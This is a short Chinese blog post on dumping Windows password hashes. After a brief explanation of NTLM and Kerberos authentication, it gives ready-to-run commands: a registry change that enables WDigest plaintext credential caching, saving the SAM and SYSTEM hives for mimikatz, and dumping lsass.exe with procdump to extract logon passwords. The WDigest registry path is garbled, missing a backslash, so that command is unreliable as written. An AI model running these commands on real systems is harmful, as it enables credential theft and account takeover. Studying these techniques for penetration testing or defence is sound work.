Loading

Windows hash抓取

一、windows系统的身份认证

1、ntlm

当ntlm用于没域环境的本地认证时:开机调用登录框让你输密码,系统把密码传给lsass.exe进程。lsass把你输入的密码二话不说先在内存中存一份明文的,当把明文密码加密成NTLM hash之后和windows系统本地存储的SAM数据库中这个登录用户的NTLM hash进行对比,如果一致则登录成功
当ntlm用于有域环境的网络认证时:可以使用kerberos,也可以使用ntlm。这里的ntlm基于一种叫做challenge/response的机制。

2、Kerberos

用于域环境认证

3、hash明文

高版本windows系统(win10、win2012 R2以上版本存在只能抓hash不能抓明文的问题,会显示null,因为系统内存缓存中不再存有明文了)
想要继续抓明文要改注册表:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

二、本地抓取hash

reg save hklm\sam sam.hive
reg save hklm\system system.hive
mimikatz "lsadump::sam /sam:sam.hive /system:system.hive" > hash.txt

三、procdump抓取lsass进程hash

procdump.exe -accepteula -ma lsass.exe xx.dmp
mimikatz.exe "sekurlsa::minidump xx.dmp" "sekurlsa::logonPasswords full" > hash.txt

四、其它hash抓取方法

https://www.cnblogs.com/sakura521/p/15473661.html

posted @ 2021-08-25 20:56  Ctrl_C+Ctrl_V  阅读(148)  评论(0)    收藏  举报